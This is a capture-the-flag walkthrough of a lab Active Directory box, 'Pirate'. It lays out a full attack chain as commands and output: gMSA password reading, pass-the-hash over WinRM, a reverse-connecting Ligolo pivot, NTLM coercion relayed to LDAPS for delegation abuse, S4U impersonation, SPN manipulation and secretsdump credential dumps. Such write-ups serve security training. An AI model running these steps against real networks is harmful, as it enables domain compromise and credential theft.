Initial Creds
As is common in real life pentests, you will start the Pirate box with credentials for the following account:
pentest
p3nt3st2025!&
Enum
- Basic scans and setup
$ export IP=10.129.7.107
$ rustscan --ulimit 10000 -a $IP -- -sCTV -Pn
Open 10.129.7.107:53
Open 10.129.7.107:80
Open 10.129.7.107:88
Open 10.129.7.107:135
Open 10.129.7.107:139
Open 10.129.7.107:593
Open 10.129.7.107:636
Open 10.129.7.107:389
Open 10.129.7.107:464
Open 10.129.7.107:445
Open 10.129.7.107:9389
Open 10.129.7.107:49666
Open 10.129.7.107:49678
Open 10.129.7.107:49677
Open 10.129.7.107:49680
Open 10.129.7.107:49681
Open 10.129.7.107:49906
Open 10.129.7.107:51750
Open 10.129.7.107:51775
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-03-01 06:22:42Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA/domainComponent=pirate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after: 2026-06-09T14:05:15
| MD5: 5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1: 0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
| SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
|_ssl-date: 2026-03-01T06:24:13+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA/domainComponent=pirate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after: 2026-06-09T14:05:15
| MD5: 5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1: 0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
| SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
|_ssl-date: 2026-03-01T06:24:12+00:00; +7h00m00s from scanner time.
9389/tcp open mc-nmf syn-ack .NET Message Framing
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack Microsoft Windows RPC
49680/tcp open msrpc syn-ack Microsoft Windows RPC
49681/tcp open msrpc syn-ack Microsoft Windows RPC
49906/tcp open msrpc syn-ack Microsoft Windows RPC
51750/tcp open msrpc syn-ack Microsoft Windows RPC
51775/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 47698/tcp): CLEAN (Timeout)
| Check 2 (port 24309/tcp): CLEAN (Timeout)
| Check 3 (port 58054/udp): CLEAN (Timeout)
| Check 4 (port 53986/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-03-01T06:23:32
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s- Fix time skew
- Update
/etc/hosts
$ sudo ntpdate $IP
$ echo "$IP pirate.htb dc01.pirate.htb dc01 DC01" | sudo tee -a /etc/hosts- Testing our initial credentials we find we can enumerate
smbandldap - We find some interesting information searching for
gmsaand weak security nxcis pretty handy here for its modules
$ nxc smb $IP -u 'pentest' -p'p3nt3st2025!&'
SMB 10.129.7.107 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.107 445 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
$ nxc smb $IP -u 'pentest' -p'p3nt3st2025!&' --rid-brute
SMB 10.129.7.107 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.107 445 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
SMB 10.129.7.107 445 DC01 498: PIRATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 500: PIRATE\Administrator (SidTypeUser)
SMB 10.129.7.107 445 DC01 501: PIRATE\Guest (SidTypeUser)
SMB 10.129.7.107 445 DC01 502: PIRATE\krbtgt (SidTypeUser)
SMB 10.129.7.107 445 DC01 512: PIRATE\Domain Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 513: PIRATE\Domain Users (SidTypeGroup)
SMB 10.129.7.107 445 DC01 514: PIRATE\Domain Guests (SidTypeGroup)
SMB 10.129.7.107 445 DC01 515: PIRATE\Domain Computers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 516: PIRATE\Domain Controllers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 517: PIRATE\Cert Publishers (SidTypeAlias)
SMB 10.129.7.107 445 DC01 518: PIRATE\Schema Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 519: PIRATE\Enterprise Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 520: PIRATE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.7.107 445 DC01 521: PIRATE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 522: PIRATE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.7.107 445 DC01 525: PIRATE\Protected Users (SidTypeGroup)
SMB 10.129.7.107 445 DC01 526: PIRATE\Key Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 527: PIRATE\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.7.107 445 DC01 553: PIRATE\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.7.107 445 DC01 571: PIRATE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.7.107 445 DC01 572: PIRATE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.7.107 445 DC01 1000: PIRATE\DC01$ (SidTypeUser)
SMB 10.129.7.107 445 DC01 1101: PIRATE\DnsAdmins (SidTypeAlias)
SMB 10.129.7.107 445 DC01 1102: PIRATE\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.7.107 445 DC01 1103: PIRATE\IT (SidTypeGroup)
SMB 10.129.7.107 445 DC01 1104: PIRATE\a.white_adm (SidTypeUser)
SMB 10.129.7.107 445 DC01 3101: PIRATE\a.white (SidTypeUser)
SMB 10.129.7.107 445 DC01 3102: PIRATE\WEB01$ (SidTypeUser)
$ nxc ldap $IP -u 'pentest' -p'p3nt3st2025!&'
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
$ nxc ldap 10.129.7.107 -u pentest -p 'p3nt3st2025!&' --find-delegation
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.107 389 DC01 AccountName AccountType DelegationType DelegationRightsTo
LDAP 10.129.7.107 389 DC01 ----------- ----------- ---------------------------------- ---------------------------------------
LDAP 10.129.7.107 389 DC01 a.white_adm Person Constrained w/ Protocol Transition http/WEB01.pirate.htb, HTTP/WEB01
$ nxc ldap $IP -u 'pentest' -p'p3nt3st2025!&' --gmsa
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.107 389 DC01 [*] Getting GMSA Passwords
LDAP 10.129.7.107 389 DC01 Account: gMSA_ADCS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers
LDAP 10.129.7.107 389 DC01 Account: gMSA_ADFS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers
$ nxc ldap $IP -u 'pentest' -p'p3nt3st2025!&' --password-not-required
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
LDAP 10.129.7.107 389 DC01 User: MS01$ Status: enabled
LDAP 10.129.7.107 389 DC01 User: EXCH01$ Status: enabled
LDAP 10.129.7.107 389 DC01 User: Guest Status: disabled- We see another machine
WEB01, usera.white_admhas delegation rights gMSA_ADCS_prod$&gMSA_ADCS_prod$may have readable GMSA passwords with other credentialsMS01$does not require a password, maybe has the privs we need- Can grab a ticket to then attempt reading GMSA again
$ getTGT.py 'pirate.htb/MS01$:ms01' -dc-ip $IP
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in MS01$.ccache
$ export KRB5CCNAME=MS01$.ccache
$ klist
Ticket cache: FILE:MS01$.ccache
Default principal: MS01$@PIRATE.HTB- Now try GMSA again using
--use-kcacheflag for authentication this time
$ nxc ldap $IP --use-kcache --gmsa
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:PIRATE.HTB) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] PIRATE.HTB\MS01$ from ccache
LDAP 10.129.7.107 389 DC01 [*] Getting GMSA Passwords
LDAP 10.129.7.107 389 DC01 Account: gMSA_ADCS_prod$ NTLM: 304106f739822ea2ad8ebe23f802d078 PrincipalsAllowedToReadPassword: Domain Secure Servers
LDAP 10.129.7.107 389 DC01 Account: gMSA_ADFS_prod$ NTLM: 8126756fb2e69697bfcb04816e685839 PrincipalsAllowedToReadPassword: Domain Secure Servers
$ nxc winrm $IP -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078
WINRM 10.129.7.107 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
WINRM 10.129.7.107 5985 DC01 [+] pirate.htb\gMSA_ADCS_prod$:304106f739822ea2ad8ebe23f802d078 (Pwn3d!)
$ nxc winrm $IP -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
WINRM 10.129.7.107 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
WINRM 10.129.7.107 5985 DC01 [+] pirate.htb\gMSA_ADFS_prod$:8126756fb2e69697bfcb04816e685839 (Pwn3d!)- We can use either of these hashes to remote into
DC01
$ evil-winrm -i $IP -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078
*Evil-WinRM* PS C:\Users\gMSA_ADCS_prod$\Documents>
$ evil-winrm -i dc01.pirate.htb -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents>- Since we saw something about
WEB01machine earlier, we should check our network config
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> nslookup dc01
Server: localhost
Address: 127.0.0.1
Name: dc01.pirate.htb
Addresses: 192.168.100.1
10.129.7.107
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> nslookup web01
Server: localhost
Address: 127.0.0.1
Name: WEB01.pirate.htb
Address: 192.168.100.2Internals
DC01192.168.100.1
WEB01192.168.100.2
- We will need to pivot in order to access
- Ligolo is pretty great for this
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> upload agent.exe
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> .\agent.exe -connect YOUR_IP:PORT -ignore-cert -retry- On your machine
$ sudo ./proxy -selfcert -laddr 0.0.0.0:PORT
ligolo-ng » session
? Specify a session : 1 - PIRATE\gMSA_ADFS_prod$@DC01 - 10.129.7.107:64365 - 00155d0bd000
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » ifcreate --name ligolo
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » route_add --name ligolo --route 240.0.0.0/4
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » route_add --name ligolo --route 192.168.100.0/24
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » start --tun ligolo- We can update
/etc/hostswith this IP forWEB01
$ echo "192.168.100.2 web01.pirate.htb web01 WEB01" | sudo tee -a /etc/hosts- Testing hashes again against
web01we can also remote in withgMSA_ADFS_prod$
$ nxc winrm web01 -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078
WINRM 192.168.100.2 5985 WEB01 [*] Windows 10 / Server 2019 Build 17763 (name:WEB01) (domain:pirate.htb)
WINRM 192.168.100.2 5985 WEB01 [-] pirate.htb\gMSA_ADCS_prod$:304106f739822ea2ad8ebe23f802d078
$ nxc winrm web01 -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
WINRM 192.168.100.2 5985 WEB01 [*] Windows 10 / Server 2019 Build 17763 (name:WEB01) (domain:pirate.htb)
WINRM 192.168.100.2 5985 WEB01 [+] pirate.htb\gMSA_ADFS_prod$:8126756fb2e69697bfcb04816e685839 (Pwn3d!)- Connect and we can verify we are on
WEB01
$ evil-winrm -i web01.pirate.htb -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.100.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.1User
- WinPEAS reveals some AutoLogon information
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> upload winPEASany.exe
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> ./winPEASany.exe
*snip*
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : PIRATE
DefaultUserName : a.white- We can enumerate a little further by checking registry
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ PIRATE
DefaultUserName REG_SZ a.white
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
ShellAppRuntime REG_SZ ShellAppRuntime.exe
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0xdf8ec1d0
ShutdownFlags REG_DWORD 0x13
AutoAdminLogon REG_SZ 1
AutoLogonSID REG_SZ S-1-5-21-4107424128-4158083573-1300325248-3101
LastUsedUsername REG_SZ a.white
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey- Seems likely that
a.whiteis logging in automatically, maybe we need to coerce and see if we can capture anything interesting - We can try the coercer module in
nxcto test potential capture vectors after setting up ournltmrelayxlistener
$ sudo ntlmrelayx.py -t ldaps://$IP --delegate-access --remove-mic -smb2support- Trigger coercion (update your IP)
$ nxc smb web01 -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839 -M coerce_plus -o LISTENER=<YOUR_IP>
SMB 192.168.100.2 445 WEB01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:None)
SMB 192.168.100.2 445 WEB01 [+] pirate.htb\gMSA_ADFS_prod$:8126756fb2e69697bfcb04816e685839
COERCE_PLUS 192.168.100.2 445 WEB01 VULNERABLE, PetitPotam
COERCE_PLUS 192.168.100.2 445 WEB01 Exploit Success, efsrpc\EfsRpcAddUsersToFile
COERCE_PLUS 192.168.100.2 445 WEB01 VULNERABLE, PrinterBug
COERCE_PLUS 192.168.100.2 445 WEB01 VULNERABLE, PrinterBug- We observe successful exploitation in the listener with random account creation
*snip*
[*] Servers started, waiting for connections
[*] (SMB): Received connection from 10.129.7.107, attacking target ldaps://10.129.7.107
[*] (SMB): Authenticating connection from PIRATE/WEB01$@10.129.7.107 against ldaps://10.129.7.107 SUCCEED [1]
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> Enumerating relayed user`s privileges. This may take a while on large domains
[*] All targets processed!
[*] (SMB): Connection from 10.129.7.107 controlled, but there are no more targets left!
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> Attempting to create computer in: CN=Computers,DC=pirate,DC=htb
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> Adding new computer with username: MHNBCAIC$ and password: M1r{h_ip^lC7<bk result: OK
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> Delegation rights modified succesfully!
[*] ldaps://PIRATE/WEB01$@10.129.7.107 [1] -> MHNBCAIC$ can now impersonate users on WEB01$ via S4U2Proxy
[*] All targets processed!- We can try to now impersonate
AdministratorofWEB01with this user - Using HTTP in
spnso we canwinrm
$ getST.py -dc-ip $IP -spn HTTP/web01.pirate.htb -impersonate Administrator 'PIRATE.HTB/MHNBCAIC$:M1r{h_ip^lC7<bk'
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@HTTP_web01.pirate.htb@PIRATE.HTB.ccache
$ export KRB5CCNAME=Administrator@HTTP_web01.pirate.htb@PIRATE.HTB.ccache- Connect via
evil-winrmand grab user flag
$ evil-winrm -i web01.pirate.htb -r PIRATE.HTB -u Administrator
*Evil-WinRM* PS C:\Users\Administrator.PIRATE\Documents> whoami
pirate\administrator
*Evil-WinRM* PS C:\Users\Administrator.PIRATE\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.100.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../../a.white/Desktop/user.txtRoot
- Dump of
WEB01reveals logon credentials fora.whitethat we can test
$ secretsdump.py -k -no-pass -target-ip 192.168.100.2 PIRATE.HTB/Administrator@web01.pirate.htb
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x342dfe90cc4061078b79f011cd08f931
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b1aac1584c2ea8ed0a9429684e4fc3e5:::
[*] DefaultPassword
PIRATE\a.white:E2nvAOKSz5Xz2MJu
$ nxc smb $IP -u 'a.white' -p 'E2nvAOKSz5Xz2MJu'
SMB 10.129.7.107 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.107 445 DC01 [+] pirate.htb\a.white:E2nvAOKSz5Xz2MJu
$ nxc ldap $IP -u 'a.white' -p 'E2nvAOKSz5Xz2MJu'
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\a.white:E2nvAOKSz5Xz2MJu
$ nxc winrm $IP -u 'a.white' -p 'E2nvAOKSz5Xz2MJu'
WINRM 10.129.7.107 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
WINRM 10.129.7.107 5985 DC01 [-] pirate.htb\a.white:E2nvAOKSz5Xz2MJu- Enumerating the account we find we can edit
a.white_adm
$ bloodyAD --host $IP -u a.white -p 'E2nvAOKSz5Xz2MJu' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=Angela White,CN=Users,DC=pirate,DC=htb
permission: WRITE- Reset password so we can rerun and enumerate further
$ bloodyAD --host $IP -u a.white -p 'E2nvAOKSz5Xz2MJu' set password a.white_adm 'asdfASDF1234!'
[+] Password changed successfully!- Check same thing with these new creds
$ bloodyAD --host $IP -u a.white_adm -p 'asdfASDF1234!' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=WEB01,CN=Computers,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=MS01,CN=Computers,DC=pirate,DC=htb
permission: WRITE
distinguishedName: CN=EXCH01,CN=Computers,DC=pirate,DC=htb
permission: WRITE- We can remove the SPN and add our own for another impersonation except for
DC01this time
$ bloodyAD --host dc01.pirate.htb -d pirate.htb -u a.white_adm -p 'asdfASDF1234!' msldap delspn 'CN=WEB01,CN=Computers,DC=pirate,DC=htb' 'HTTP/WEB01.pirate.htb'
SPN removed!
$ bloodyAD --host dc01.pirate.htb -d pirate.htb -u a.white_adm -p 'asdfASDF1234!' msldap addspn 'CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb' 'HTTP/WEB01.pirate.htb'
SPN added!- Now we can get another ticket impersonating
Administratorand connect viaevil-winrm
$ getST.py -dc-ip $IP -spn HTTP/WEB01.pirate.htb -altservice HTTP/DC01.pirate.htb -impersonate Administrator 'pirate.htb/a.white_adm:asdfASDF1234!'
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from HTTP/WEB01.pirate.htb@PIRATE.HTB to HTTP/DC01.pirate.htb@PIRATE.HTB
[*] Saving ticket in Administrator@HTTP_DC01.pirate.htb@PIRATE.HTB.ccache
$ export KRB5CCNAME=Administrator@HTTP_DC01.pirate.htb@PIRATE.HTB.ccache
$ nxc ldap $IP --use-kcache
LDAP 10.129.7.107 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.7.107 389 DC01 [+] pirate.htb\Administrator from ccache (Pwn3d!)
$ nxc smb $IP --use-kcache
SMB 10.129.7.107 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.7.107 445 DC01 [+] pirate.htb\Administrator from ccache (Pwn3d!)
$ evil-winrm -i dc01.pirate.htb -r PIRATE.HTB -u Administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
pirate\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (Switch01):
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
IPv4 Address. . . . . . . . . . . : 192.168.100.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.7.107
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/*.txt- We can
secretsdumpagain for hash and password
$ secretsdump.py -k -no-pass -target-ip $IP PIRATE.HTB/Administrator@dc01.pirate.htb
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xaf025c301b1be34c7df7d48a75318dd6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:598295e78bd72d66f837997baf715171:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
*snip*
[*] DefaultPassword
PIRATE\Administrator:gODNiUG69Mz77SIZ- Alternate connections
$ evil-winrm -i $IP -u Administrator -p 'gODNiUG69Mz77SIZ'
$ evil-winrm -i $IP -u Administrator -H 598295e78bd72d66f837997baf715171